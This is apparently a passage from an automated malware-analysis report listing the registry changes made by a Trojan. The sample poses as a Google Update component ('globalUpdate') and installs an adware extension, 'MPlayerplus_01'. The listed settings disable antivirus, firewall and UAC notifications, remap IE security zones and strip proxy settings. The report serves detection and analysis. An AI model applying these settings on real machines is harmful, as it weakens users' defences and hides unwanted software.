[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"

[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"

[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"

[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"

[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"

[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 9D 5B 2C 25 22 B6 61 FA EC BE 47 B7 0C F6 F1"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"

[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

The Trojan deletes the following registry key(s):

[HKCR\AppID\GoogleUpdate.exe]

The process GoogleUpdate.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 18 34 09 4C C7 E6 81 D7 1A AA 6A A0 D2 1D 06"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:2356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 50 26 F1 F0 98 AB 00 17 4C 40 9D 67 39 12 4B"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process 772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 8B 23 88 65 65 F9 5D 2D BE 45 A6 87 AB C1 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process Iufkopcpdfjpcg.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\extensionData\,"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Name" = "Freeven"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54246" = "MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"Publisher" = "Freeven"

[HKCU\Software\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"UninstallString" = "%Program Files%\MPlayerplus_01\Uninstall.exe /fcp=1"
"DisplayName" = "MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"

[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayVersion" = "1.34.5.12"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrPublisherId" = "21636"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrAppId" = "54246"

[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledChrome" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"srcid_var" = "001359"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayIcon" = "%Program Files%\MPlayerplus_01\utils.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 9B AC B7 08 AE 3C 95 8A CB 9E E3 B4 AF DF 7B"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"MPlayerplus_01-bg.exe" = "8000"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"pv" = "1.3.25.0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledFirefox" = "1"
"BundledIe" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies the IE security zone settings to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process MPlayerplus_01-bg.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 66 9A 82 C6 A9 5C 2A BA 11 AA 66 12 93 F0 B4"

The process 772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 B8 6F 84 AA 5F DB F5 AC 99 5D CC C9 A8 C4 88"

The process %original file name%.exe:688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Aas]

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas\695404737]
"28676484" = "35"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Aas]

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas\695404737]
"7169121" = "218"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 8B CF 82 61 5C 66 6D AB D0 2F EA 78 DA 6A 10"

[HKCU\Software\Aas\695404737]
